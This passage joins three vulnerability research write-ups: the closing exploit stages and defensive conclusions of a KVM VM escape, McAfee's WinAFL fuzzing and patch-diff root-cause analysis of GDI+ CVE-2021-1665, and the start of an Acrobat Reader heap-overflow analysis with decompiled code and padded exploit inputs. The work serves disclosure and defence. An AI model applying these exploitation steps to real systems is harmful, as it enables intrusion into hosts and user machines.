  8. stage0 disables Write Protection in CR0 and overwrites an unused executable memory location with the stage1 and stage2 payloads, before jumping to stage1.
  9. stage1 overwrites kvm->arch.kvmclock_update_work.work.func with a pointer to stage2 before restoring the original host context.
  10. At some later point in time kvm->arch.kvmclock_update_work.work.func is called as part of the global kernel work_queue and stage2 spawns an arbitrary command using call_usermodehelper.

Interested readers should take a look at the heavily documented proof-of-concept exploit for the actual implementation.

Conclusion

This blog post describes a KVM-only VM escape made possible by a small bug in KVM’s AMD-specific code for supporting nested virtualization. Luckily, the feature that made this bug exploitable was only included in two kernel versions (v5.10, v5.11) before the issue was spotted, reducing the real-life impact of the vulnerability to a minimum. The bug and its exploit still serve as a demonstration that highly exploitable security vulnerabilities can still exist in the very core of a virtualization engine, which is almost certainly a small and well audited codebase. While the attack surface of a hypervisor such as KVM is relatively small from a pure LoC perspective, its low level nature, close interaction with hardware and pure complexity makes it very hard to avoid security-critical bugs.

While we have not seen any in-the-wild exploits targeting hypervisors outside of competitions like Pwn2Own, these capabilities are clearly achievable for a well-financed adversary. I’ve spent around two months on this research, working as an individual with only remote access to an AMD system. Looking at the potential ROI on an exploit like this, it seems safe to assume that more people are working on similar issues right now and that vulnerabilities in KVM, Hyper-V, Xen or VMware will be exploited in-the-wild sooner or later. 

What can we do about this? Security engineers working on Virtualization Security should push for as much attack surface reduction as possible. Moving complex functionality to memory-safe user space components is a big win even if it does not help against bugs like the one described above. Disabling unneeded or unreviewed features and performing regular in-depth code reviews for new changes can further reduce the risk of bugs slipping by.

Hosters, cloud providers and other enterprises that rely on virtualization for multi-tenancy isolation should design their architecture in a way that limits the impact of an attacker with a VM escape exploit:

  • Isolation of VM hosts: Machines that host untrusted VMs should be considered at least partially untrusted. While a VM escape can give an attacker full control over a single host, it should not be easily possible to move from one compromised host to another. This requires that the control plane and backend infrastructure is sufficiently hardened and that user resources like disk images or encryption keys are only exposed to hosts that need them. One way to limit the impact of a VM escape even further is to only run VMs of a specific customer or of a certain sensitivity on a single machine.
  • Investing in detection capabilities: In most architectures, the behavior of a VM host should be very predictable, making a compromised host stick out quickly once an attacker tries to move to other systems. While it’s very hard to rule out the possibility of a vulnerability in your virtualization stack, good detection capabilities make life for an attacker much harder and increase the risk of quickly burning a high-value vulnerability. Agents running on the VM host can be a first (but bypassable) detection mechanism, but the focus should be on detecting unusual network communication and resource accesses.

Analyzing CVE-2021-1665 – Remote Code Execution Vulnerability in Windows GDI+

28 June 2021 at 19:44

Introduction

Microsoft Windows Graphics Device Interface+, also known as GDI+, allows various applications to use different graphics functionality on video displays as well as printers. Windows applications don’t access graphics hardware or device drivers directly; instead they interact with GDI, which in turn interacts with the device drivers. In this way, GDI provides Windows applications with an abstraction layer and a common set of APIs for everyone to use.

Because of its complex format, GDI+ has a known history of vulnerabilities. We at McAfee continuously fuzz various open source and closed source software, including Windows GDI+. Over the last few years we have reported various issues to Microsoft in several Windows components, including GDI+, and have received CVEs for them.

In this post, we detail our root cause analysis of one such vulnerability which we found using WinAFL: CVE-2021-1665 – GDI+ Remote Code Execution Vulnerability.  This issue was fixed in January 2021 as part of a Microsoft Patch.

What is WinAFL?

WinAFL is a Windows port of the popular AFL fuzzer and is maintained by Ivan Fratric of Google Project Zero. WinAFL performs dynamic binary instrumentation using DynamoRIO and requires a program called a harness. A harness is simply a program which calls the APIs we want to fuzz.

A simple harness for this is already provided with WinAFL; we can enable the “Image->GetThumbnailImage” code, which is commented out by default. Following is the harness code to fuzz the GDI+ Image and GetThumbnailImage APIs:
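
A minimal sketch along those lines (the fuzzMe name and two-argument signature match the WinAFL command lines used later in this post; the rest is an approximation rather than the exact harness):

#include <windows.h>
#include <gdiplus.h>
#pragma comment(lib, "gdiplus.lib")

using namespace Gdiplus;

// Target function instrumented by WinAFL: load the input image and ask GDI+
// for a thumbnail, which exercises the code paths we want to fuzz.
extern "C" __declspec(dllexport) __declspec(noinline)
int fuzzMe(int argc, wchar_t **argv) {
    if (argc < 2) return 0;
    Image *image = new Image(argv[1]);
    if (image->GetLastStatus() == Ok) {
        Image *thumb = image->GetThumbnailImage(100, 100, NULL, NULL);
        if (thumb) delete thumb;
    }
    delete image;
    return 0;
}

int wmain(int argc, wchar_t **argv) {
    GdiplusStartupInput input;
    ULONG_PTR token;
    GdiplusStartup(&token, &input, NULL);   // initialize GDI+ once, outside the fuzzed function
    int ret = fuzzMe(argc, argv);
    GdiplusShutdown(token);
    return ret;
}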

 

As you can see, this small piece of code simply creates a new image object from the provided input file and then calls another function to generate a thumbnail image. This makes for an excellent attack vector and can affect various Windows applications if they use thumbnail images. In addition, this requires little user interaction; thus any software which uses GDI+ and calls the GetThumbnailImage API is potentially vulnerable.

Collecting Corpus:

A good corpus provides a sound foundation for fuzzing. For that, we can use Google or GitHub, in addition to test corpora shipped with various software and public EMF files released for other vulnerabilities. We also generated a few test files by modifying sample code provided on Microsoft’s site which generates an EMF file with EmfPlusDrawString and other records:

Ref: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-emfplus/07bda2af-7a5d-4c0b-b996-30326a41fa57

Minimizing Corpus:

After we have collected an initial corpus, we need to minimize it. For this we can use a utility called winafl-cmin.py as follows:

winafl-cmin.py -D D:\\work\\winafl\\DynamoRIO\\bin32 -t 10000 -i inCorpus -o minCorpus -covtype edge -coverage_module gdiplus.dll -target_module gdiplus_hardik.exe -target_method fuzzMe -nargs 2 -- gdiplus_hardik.exe @@

How does WinAFL work?

WinAFL uses the concept of in-memory fuzzing. We need to provide a function name to WinAFL. It will save the program state at the start of the function and take one input file from the corpus, mutate it, and feed it to the function.

It will monitor this for any new code paths or crashes. If it finds a new code path, it will consider the new file an interesting test case and add it to the queue for further mutation. If it finds any crashes, it will save the crashing file in the crashes folder.

The following picture shows the fuzzing flow:

Fuzzing with WinAFL:

Once we have compiled our harness program and collected and minimized the corpus, we can run this command to fuzz our program with WinAFL:

afl-fuzz.exe -i minCorpus -o out -D D:\work\winafl\DynamoRIO\bin32 -t 20000 -coverage_module gdiplus.dll -fuzz_iterations 5000 -target_module gdiplus_hardik.exe -target_offset 0x16e0 -nargs 2 -- gdiplus_hardik.exe @@

Results:

We found a few crashes; after triaging the unique ones, we found a crash in “gdiplus!BuiltLine::GetBaselineOffset” which looks as follows in the call stack below:

As can be seen in the above image, the program is crashing while trying to read data from the memory address pointed to by edx+8. We can see that the registers ebx, ecx and edx contain c0c0c0c0, which means that page heap is enabled for the binary. We can also see that c0c0c0c0 is being passed as a parameter to the “gdiplus!FullTextImager::RenderLine” function.

Patch Diffing to See If We Can Find the Root Cause

To figure out the root cause, we can use patch diffing: namely, we can use the IDA BinDiff plugin to identify what changes were made to the patched file. If we are lucky, we can easily find the root cause just by looking at the code that was changed. So we can generate IDB files for the patched and unpatched versions of gdiplus.dll and then run the IDA BinDiff plugin to see the changes.

We can see that one new function was added in the patched file, and it seems to be a destructor for the BuiltLine object:

We can also see that there are a few functions where the similarity score is < 1; one such function is FullTextImager::BuildAllLines, as shown below:

Now, to confirm whether this function is really the one which was patched, we can run our test program and POC in WinDbg and set a breakpoint on this function. We can see that the breakpoint is hit and the program doesn’t crash anymore:

Now, as a next step, we need to identify what was changed in this function to fix the vulnerability. For that we can check the flow graph of this function, which looks as follows. Unfortunately, there are too many changes to identify the vulnerability by simply looking at the diff:

The left side illustrates the unpatched DLL while the right side shows the patched DLL:

  • Green indicates that the patched and unpatched blocks are the same.
  • Yellow blocks indicate there have been some changes between the unpatched and patched DLLs.
  • Red blocks call out differences between the DLLs.

If we zoom in on the yellow blocks, we can see the following:

We can note several changes. A few blocks are removed in the patched DLL, so patch diffing alone will not be sufficient to identify the root cause of this issue. However, it presents valuable hints about where to look and what to look for when using other debugging methods such as WinDbg. A few observations we can spot from the BinDiff output above:

  • In the unpatched DLL, if we check carefully we can see that there is a call to the “GetuntrimmedCharacterCount” function, and later on there is another call to the function “SetSpan::SpanVector”.
  • In the patched DLL, we can see that there is a call to “GetuntrimmedCharacterCount” whose return value, stored in the EAX register, is checked. If it is zero, control jumps to another location: the destructor for the BuiltLine object, which is the newly added code in the patched DLL:

So we can assume that this is where the vulnerability is fixed. Now we need to figure out the following:

  1. Why is our program crashing with the provided POC file?
  2. Which field in the file is causing this crash?
  3. What is the value of that field?
  4. Which condition in the program is causing this crash?
  5. How was this fixed?

EMF File Format:

EMF, also known as the Enhanced Metafile Format, is used to store graphical images in a device-independent way. An EMF file consists of various variable-length records. It can contain definitions of various graphics objects, drawing commands and other graphics properties.

Credit: MS EMF documentation.

Generally, an EMF file consists of the following records:

  1. EMF Header – This contains information about the EMF structure.
  2. EMF Records – These are variable-length records containing information about graphics properties, drawing order, and so forth.
  3. EMF EOF Record – This is the last record in the EMF file.

The detailed specification of the EMF file format can be found on Microsoft's site at the following URL:

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-emf/91c257d7-c39d-4a36-9b1f-63e3f73d30ca
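
Before hunting for the specific record, it helps to keep the container structure in mind. The following minimal sketch (our own illustration, not part of the original analysis) walks the EMF records of a file by reading the 4-byte type and 4-byte size fields that prefix every record; everything beyond the record header is skipped.

import java.nio.ByteBuffer;
import java.nio.ByteOrder;
import java.nio.file.Files;
import java.nio.file.Paths;

public class EmfRecordWalker {
    public static void main(String[] args) throws Exception {
        // Read the whole EMF file into a little-endian buffer.
        ByteBuffer buf = ByteBuffer.wrap(Files.readAllBytes(Paths.get(args[0])))
                                   .order(ByteOrder.LITTLE_ENDIAN);
        int offset = 0;
        while (offset + 8 <= buf.capacity()) {
            int type = buf.getInt(offset);      // record type, e.g. 0x01 = EMR_HEADER, 0x0E = EMR_EOF
            int size = buf.getInt(offset + 4);  // total record size in bytes, including this header
            System.out.printf("offset=0x%x type=0x%x size=0x%x%n", offset, type, size);
            if (type == 0x0E || size <= 0) break; // stop at the EOF record or on a malformed size
            offset += size;                       // records are contiguous, so jump to the next one
        }
    }
}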

Locating the Vulnerable Record in the EMF File:

Generally, most of the issues in EMF are caused by malformed or corrupt records. We need to figure out which record type is causing this crash. If we look at the call stack, we can see the following:

We can notice a call to the function "gdiplus!GdipPlayMetafileRecordCallback".

By setting a breakpoint on this function and checking its parameters, we can see the following:

We can see that EDX contains a memory address and that the parameters given to this function are 0x00401c, 0x00000000 and 0x00000044.

Also, on checking the location pointed to by EDX, we can see the following:

If we check our POC EMF file, we can see that this data comes from the file at offset 0x15c:

By going through the EMF specification and manually parsing the records, we can easily figure out that this is an "EmfPlusDrawString" record, the format of which is shown below:

In our case:

Record Type = 0x401c EmfPlusDrawString record

Flags = 0x0000

Size = 0x50

Data size = 0x44

Brushid = 0x02

Format id = 0x01

Length = 0x14

Layoutrect = 00 00 00 00 00 00 00 00 FC FF C7 42 00 00 80 FF

String data =
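
Based on the field breakdown above, a rough sketch of pulling these fields out of the raw file could look as follows. The offsets are derived from the listed layout and the helper is purely illustrative.

import java.nio.ByteBuffer;
import java.nio.ByteOrder;
import java.nio.charset.StandardCharsets;

public class EmfPlusDrawStringParser {
    // 'data' is assumed to hold the file contents, 'off' the record offset (0x15c in our POC).
    static void parseDrawString(byte[] data, int off) {
        ByteBuffer b = ByteBuffer.wrap(data).order(ByteOrder.LITTLE_ENDIAN);
        int type     = b.getShort(off) & 0xffff;      // 0x401c = EmfPlusDrawString
        int flags    = b.getShort(off + 2) & 0xffff;  // 0x0000
        int size     = b.getInt(off + 4);             // 0x50, total record size
        int dataSize = b.getInt(off + 8);             // 0x44
        int brushId  = b.getInt(off + 12);            // 0x02
        int formatId = b.getInt(off + 16);            // 0x01
        int length   = b.getInt(off + 20);            // 0x14, number of UTF-16 characters
        // The 16-byte layout rectangle follows at off+24; the string data starts right after it.
        String text = new String(data, off + 40, length * 2, StandardCharsets.UTF_16LE);
        System.out.printf("type=0x%x flags=0x%x size=0x%x dataSize=0x%x brush=0x%x format=0x%x length=0x%x text=%s%n",
                          type, flags, size, dataSize, brushId, formatId, length, text);
    }
}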

Now that we have located the record that seems to be causing the crash, the next thing is to figure out why our program is crashing. If we debug and check the code, we can see that control reaches the function "gdiplus!FullTextImager::BuildAllLines". When we decompile this code, we can see something like this:

The following diagram shows the function call hierarchy:

The execution flow in summary:

  1. Inside the "Builtline::BuildAllLines" function there is a while loop in which the program allocates 0x60 bytes of memory. Then it calls the "Builtline::BuiltLine" function.
  2. The "Builtline::BuiltLine" function moves data to the newly allocated memory and then calls "BuiltLine::GetUntrimmedCharacterCount".
  3. The return value of "BuiltLine::GetUntrimmedCharacterCount" is added to the loop counter, which is ECX. This process is repeated while the loop counter (ECX) is less than the string length (EAX), which is 0x14 here.
  4. The loop starts from 0, so it should terminate at 0x13, or it should terminate when the return value of "GetUntrimmedCharacterCount" is 0.
  5. But in the vulnerable DLL, the program doesn't terminate because of the way the loop counter is increased. Here, "BuiltLine::GetUntrimmedCharacterCount" returns 0, which is added to the loop counter (ECX) and therefore doesn't increase its value. The program allocates another 0x60 bytes of memory and creates another line, corrupting data that later leads the program to crash. The loop is executed 21 times instead of 20 (see the sketch after this list).
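
The following minimal sketch (a simplified model, not the decompiled code) condenses this loop-counter behaviour; the stand-in for "GetUntrimmedCharacterCount" is hypothetical and only mimics the crashing case, where it returns 0 for the last character.

public class LoopSketch {
    // Hypothetical stand-in for BuiltLine::GetUntrimmedCharacterCount: returns 1 for every
    // character except the last one, where it returns 0 (the crashing case).
    static int untrimmedCount(int remaining) { return remaining > 1 ? 1 : 0; }

    public static void main(String[] args) {
        int length = 0x14;       // string length taken from the record (EAX)
        int processed = 0;       // loop counter (ECX)
        int linesAllocated = 0;  // each iteration allocates a 0x60-byte BuiltLine

        while (processed < length) {
            linesAllocated++;                          // models the 0x60-byte allocation and BuiltLine()
            int consumed = untrimmedCount(length - processed);
            if (consumed == 0) {
                // Patched DLL: bail out here and destroy the BuiltLine that was just created.
                // Vulnerable DLL: there is no such check, ECX stays at 0x13 and one extra
                // (21st) line is created over corrupted state before the program falls over.
                linesAllocated++;                      // account for that extra iteration
                break;                                 // the sketch has to stop somewhere
            }
            processed += consumed;
        }
        System.out.println("lines allocated: " + linesAllocated);  // prints 21
    }
}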

In detail:

1. Inside "Builtline::BuildAllLines", 0x60 (96) bytes of memory will be allocated, and in the debugger it looks as follows:

2. Then it calls the "BuiltLine::BuiltLine" function and moves the data to the newly allocated memory:

3. This happens inside a while loop, and there is a function call to "BuiltLine::GetUntrimmedCharacterCount".

4. The return value of "BuiltLine::GetUntrimmedCharacterCount" is stored at location 0x12ff2ec. This value will be 1, as can be seen below:

5. This value gets added to ECX:

6. Then there is a check that determines if ecx < eax. If true, the loop continues; otherwise it jumps to another location:

7. Now, in the vulnerable version, the loop doesn't exit if the return value of "BuiltLine::GetUntrimmedCharacterCount" is 0: this 0 is added to ECX, so ECX does not increase. The loop therefore executes one more time with an ECX value of 0x13, leading to the loop being executed 21 times rather than 20. This is the root cause of the problem.

Also, after some debugging, we can figure out why EAX contains 0x14. It is read from the POC file at offset 0x174:

If we recall, this is the EmfPlusDrawString record and 0x14 is the length we mentioned before.

Later on, the program reaches the "FullTextImager::Render" function, corrupting the value of EAX because it reads unused memory:

This will be passed as an argument to the "FullTextImager::RenderLine" function:

Later, the program will crash while trying to access this location.

Our program was crashing while processing the EmfPlusDrawString record inside the EMF file: it accessed an invalid memory location while processing the string data field. Basically, the program was not verifying the return value of the "gdiplus!BuiltLine::GetUntrimmedCharacterCount" function, and this resulted in taking a different program path that corrupted registers and various memory values, ultimately causing the crash.

How was this issue fixed?

As we figured out by looking at the patch diff above, a check was added on the return value of the "gdiplus!BuiltLine::GetUntrimmedCharacterCount" function.

If the returned value is 0, the program XORs EBX (which contains the counter) and jumps to a location which calls the destructor for the BuiltLine object:

Here is the destructor that prevents the issue:

Conclusion:

GDI+ is a very commonly used Windows component, and a vulnerability like this can affect billions of systems across the globe. We recommend that users apply the proper updates and keep their Windows deployments current.

We at McAfee are continuously fuzzing various open source and closed source libraries and working with vendors to fix such issues, responsibly disclosing them and giving vendors proper time to fix the issues and release updates as needed.

We are thankful to Microsoft for working with us on fixing this issue and releasing an update.

The post Analyzing CVE-2021-1665 – Remote Code Execution Vulnerability in Windows GDI+ appeared first on McAfee Blog.

Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC

28 June 2021 at 10:46

By Sergi Martinez

This post analyzes and exploits CVE-2021-21017, a heap buffer overflow reported in Adobe Acrobat Reader DC prior to version 2021.001.20135. This vulnerability was anonymously reported to Adobe and patched on February 9th, 2021. A publicly posted proof-of-concept containing root-cause analysis was used as a starting point for this research.

This post is similar to our previous post on Adobe Acrobat Reader, which exploits a use-after-free vulnerability that also occurs while processing Unicode and ANSI strings.

Overview

A heap buffer-overflow occurs in the concatenation of an ANSI-encoded string corresponding to a PDF document’s base URL. This occurs when an embedded JavaScript script calls functions located in the IA32.api module that deals with internet access, such as this.submitForm and app.launchURL. When these functions are called with a relative URL of a different encoding to the PDF’s base URL, the relative URL is treated as if it has the same encoding as the PDF’s path. This can result in copying twice the number of bytes of the source ANSI string (the relative URL) into a properly-sized destination buffer, leading to both an out-of-bounds read and a heap buffer overflow.

CVE-2021-21017

Acrobat Reader has a built-in JavaScript engine based on Mozilla’s SpiderMonkey. Embedded JavaScript code in PDF files is processed and executed by the EScript.api module in Adobe Reader.

Internet access related operations are handled by the IA32.api module. The vulnerability occurs within this module when a URL is built by concatenating the PDF document’s base URL and a relative URL. This relative URL is specified as a parameter in a call to JavaScript functions that trigger any kind of Internet access such as this.submitForm and app.launchURL. In particular, the vulnerability occurs when the encoding of both strings differ.

The concatenation of both strings is done by allocating enough memory to fit the final string. The computation of the length of both strings is correctly done taking into account whether they are ANSI or Unicode. However, when the concatenation occurs only the base URL encoding is checked and the relative URL is considered to have the same encoding as the base URL. When the relative URL is ANSI encoded, the code that copies bytes from the relative URL string buffer into the allocated buffer copies it two bytes at a time instead of just one byte at a time. This leads to reading a number of bytes equal to the length of the relative URL from outside the source buffer and copying it beyond the bounds of the destination buffer by the same length, resulting in both an out-of-bounds read and an out-of-bounds write vulnerability.

Code Analysis

The following code blocks show the affected parts of methods relevant to this vulnerability. Code snippets are demarcated by reference marks denoted by [N]. Lines not relevant to this vulnerability are replaced by a [Truncated] marker.

All code listings show decompiled C code; source code is not available in the affected product. Structure definitions are obtained by reverse engineering and may not accurately reflect structures defined in the source code.

The following function is called when a relative URL needs to be concatenated to a base URL. Aside from the concatenation it also checks that both URLs are valid.

__int16 __cdecl sub_25817D70(wchar_t *Source, CHAR *lpString, char *String, _DWORD *a4, int *a5)
{
  __int16 v5; // di
  CHAR v6; // cl
  CHAR *v7; // ecx
  CHAR v8; // al
  CHAR v9; // dl
  CHAR *v10; // eax
  bool v11; // zf
  CHAR *v12; // eax

[Truncated]

  int iMaxLength; // [esp+D4h] [ebp-14h]
  LPCSTR v65; // [esp+D8h] [ebp-10h]
  int v66; // [esp+DCh] [ebp-Ch] BYREF
  LPCSTR v67; // [esp+E0h] [ebp-8h]
  wchar_t *v68; // [esp+E4h] [ebp-4h]

  v68 = 0;
  v65 = 0;
  v67 = 0;
  v38 = 0;
  v51 = 0;
  v63 = 0;
  v5 = 1;
  if ( !a5 )
    return 0;
  *a5 = 0;
  if ( lpString )
  {
    if ( *lpString )
    {
      v6 = lpString[1];
      if ( v6 )
      {

[1]

        if ( *lpString == (CHAR)0xFE && v6 == (CHAR)0xFF )
        {
          v7 = lpString;
          while ( 1 )
          {
            v8 = *v7;
            v9 = v7[1];
            v7 += 2;
            if ( !v8 )
              break;
            if ( !v9 || !v7 )
              goto LABEL_14;
          }
          if ( !v9 )
            goto LABEL_15;

[2]

LABEL_14:
          *a5 = -2;
          return 0;
        }
      }
    }
  }
LABEL_15:
  if ( !Source || !lpString || !String || !a4 )
  {
    *a5 = -2;
    goto LABEL_79;
  }

[3]

  iMaxLength = sub_25802A44((LPCSTR)Source) + 1;
  v10 = (CHAR *)sub_25802CD5(1, iMaxLength);
  v65 = v10;
  if ( !v10 )
  {
    *a5 = -7;
    return 0;
  }

[4]

  sub_25802D98((wchar_t *)v10, Source, iMaxLength);
  if ( *lpString != (CHAR)0xFE || (v11 = lpString[1] == -1, v67 = (LPCSTR)2, !v11) )
    v67 = (LPCSTR)1;

[5]

  v66 = (int)&v67[sub_25802A44(lpString)];
  v12 = (CHAR *)sub_25802CD5(1, v66);
  v67 = v12;
  if ( !v12 )
  {
    *a5 = -7;
LABEL_79:
    v5 = 0;
    goto LABEL_80;
  }

[6]

  sub_25802D98((wchar_t *)v12, (wchar_t *)lpString, v66);
  if ( !(unsigned __int16)sub_258033CD(v65, iMaxLength, a5) || !(unsigned __int16)sub_258033CD(v67, v66, a5) )
    goto LABEL_79;

[7]

  v13 = sub_25802400(v65, v31);
  if ( v13 || (v13 = sub_25802400(v67, v39)) != 0 )
  {
    *a5 = v13;
    goto LABEL_79;
  }

[Truncated]

[8]

  v23 = (wchar_t *)sub_25802CD5(1, v47 + 1 + v35);
  v68 = v23;
  if ( v23 )
  {
    if ( v35 )
    {

[9]

      sub_25802D98(v23, v36, v35 + 1);
      if ( *((_BYTE *)v23 + v35 - 1) != 47 )
      {
        v25 = sub_25818CE4(v24, (char *)v23, 47);
        if ( v25 )
          *(_BYTE *)(v25 + 1) = 0;
        else
          *(_BYTE *)v23 = 0;
      }
    }
    if ( v47 )
    {

[10]

      v26 = sub_25802A44((LPCSTR)v23);
      sub_25818BE0((char *)v23, v48, v47 + 1 + v26);
    }
    sub_25802E0C(v23, 0);
    v60 = sub_25802A44((LPCSTR)v23);
    v61 = v23;
    goto LABEL_69;
  }
  v5 = 0;
  *a4 = v47 + v35 + 1;
  *a5 = -3;
LABEL_81:
  if ( v65 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824088 + 12))(v65);
  if ( v67 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824088 + 12))(v67);
  if ( v23 )
    (*(void (__cdecl **)(wchar_t *))(dword_25824088 + 12))(v23);
  return v5;
}

The function listed above receives as parameters a string corresponding to a base URL and a string corresponding to a relative URL, as well as two pointers used to return data to the caller. The two string parameters are shown in the following debugger output.

IA32!PlugInMain+0x168b0:
605a7d70 55              push    ebp
0:000> dd poi(esp+4) L84
099a35f0  0068fffe 00740074 00730070 002f003a
099a3600  0067002f 006f006f 006c0067 002e0065
099a3610  006f0063 002f006d 41414141 41414141
099a3620  41414141 41414141 41414141 41414141
099a3630  41414141 41414141 41414141 41414141

[Truncated]

099a37c0  41414141 41414141 41414141 41414141
099a37d0  41414141 41414141 41414141 41414141
099a37e0  41414141 41414141 41414141 2f2f3a41
099a37f0  00000000 00680074 00730069 006f002e
0:000> du poi(esp+4)
099a35f0  ".https://google.com/䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3630  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3670  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a36b0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a36f0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3730  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3770  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a37b0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁㩁."
099a37f0  ""
0:000> dd poi(esp+8)
0b2d30b0  61616262 61616161 61616161 61616161
0b2d30c0  61616161 61616161 61616161 61616161
0b2d30d0  61616161 61616161 61616161 61616161
0b2d30e0  61616161 61616161 61616161 61616161

[Truncated]

0b2d5480  61616161 61616161 61616161 61616161
0b2d5490  61616161 61616161 61616161 61616161
0b2d54a0  61616161 61616161 61616161 00616161
0b2d54b0  4d21fcdc 80000900 41409090 ffff4041
0:000> da poi(esp+8)
0b2d30b0  "bbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d30d0  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d30f0  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d3110  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

[Truncated]

0b2d5430  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5450  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5470  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5490  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

The debugger output shown above corresponds to an execution of the exploit. It shows the contents of the first and second parameters (esp+4 and esp+8) of the function sub_25817D70. The first parameter contains a Unicode-encoded base URL https://google.com/ (notice the 0xfeff bytes at the start of the string), while the second parameter contains an ASCII string corresponding to the relative URL. Both contain a number of repeated bytes that serve as padding to control the allocation size needed to hold them, which is useful for exploitation.

At [1] a check is made to ascertain whether the second parameter is a valid Unicode string. If an anomaly is found the function returns at [2]. The function sub_25802A44 at [3] computes the length of the string provided as a parameter, regardless of its encoding. The function sub_25802CD5 is an implementation of calloc which allocates an array with the number of elements provided as the first parameter and the size of each element provided as the second parameter. The function sub_25802D98 at [4] copies a number of bytes of the string specified in the second parameter to the buffer pointed to by the first parameter. Its third parameter specifies the number of bytes to be copied. Therefore, at [3] and [4] the length of the base URL is computed, a new allocation of that size plus one is performed, and the base URL string is copied into the new allocation. In an analogous manner, the same operations are performed on the relative URL at [5] and [6].

The function sub_25802400, called at [7], receives a URL or a part of it and performs some validation and processing. This function is called on both base and relative URLs.

At [8] an allocation of the size required to host the concatenation of the relative URL and the base URL is performed. The lengths provided are calculated in the function called at [7]. For the sake of simplicity it is illustrated with an example: the following debugger output shows the value of the parameters to sub_25802CD5 that correspond to the number of elements to be allocated, and the size of each element. In this case the size is the addition of the length of the base and relative URLs.

eax=00002600 ebx=00000000 ecx=00002400 edx=00000000 esi=010fd228 edi=00000001
eip=61912cd5 esp=010fd0e4 ebp=010fd1dc iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
IA32!PlugInMain+0x1815:
61912cd5 55              push    ebp
0:000> dd esp+4 L1
010fd0e8  00000001
0:000> dd esp+8 L1
010fd0ec  00002600

Continuing with the function previously listed, at [9] the base URL is copied into the memory allocated to host the concatenation and at [10] its length is calculated and provided as a parameter to the call to sub_25818BE0. This function implements string concatenation for both Unicode and ANSI strings. The call to this function at [10] provides the base URL as the first parameter, the relative URL as the second parameter and the expected full size of the concatenation as the third. This function is listed below.

int __cdecl sub_25818BE0(char *Destination, char *Source, int a3)
{
  int result; // eax
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !Destination || !Source || !a3 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240AC + 4))(*(_DWORD *)(dword_258240AC + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[11]

  pExceptionObject = sub_25802A44(Destination);
  if ( pExceptionObject + sub_25802A44(Source) <= (unsigned int)(a3 - 1) )
  {

[12]

    sub_2581894C(Destination, Source);
    result = 1;
  }
  else
  {

[13]

    strncat(Destination, Source, a3 - pExceptionObject - 1);
    result = 0;
    Destination[a3 - 1] = 0;
  }
  return result;
}

In the above listing, at [11] the length of the destination string is calculated. It then checks if the length of the destination string plus the length of the source string is less than or equal to the desired concatenation length minus one. If the check passes, the function sub_2581894C is called at [12]. Otherwise the strncat function at [13] is called.

The function sub_2581894C called at [12] implements the actual string concatenation that works for both Unicode and ANSI strings.

LPSTR __cdecl sub_2581894C(LPSTR lpString1, LPCSTR lpString2)
{
  int v3; // eax
  LPCSTR v4; // edx
  CHAR *v5; // ecx
  CHAR v6; // al
  CHAR v7; // bl
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !lpString1 || !lpString2 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240AC + 4))(*(_DWORD *)(dword_258240AC + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[14]

  if ( *lpString1 == (CHAR)0xFE && lpString1[1] == (CHAR)0xFF )
  {

[15]

    v3 = sub_25802A44(lpString1);
    v4 = lpString2 + 2;
    v5 = &lpString1[v3];
    do
    {
      do
      {
        v6 = *v4;
        v4 += 2;
        *v5 = v6;
        v5 += 2;
        v7 = *(v4 - 1);
        *(v5 - 1) = v7;
      }
      while ( v6 );
    }
    while ( v7 );
  }
  else
  {

[16]

    lstrcatA(lpString1, lpString2);
  }
  return lpString1;
}

In the function listed above, at [14] the first parameter (the destination) is checked for the Unicode BOM marker 0xFEFF. If the destination string is Unicode the code proceeds to [15]. There, the source string is appended at the end of the destination string two bytes at a time. If the destination string is ANSI, then the known lstrcatA function is called.

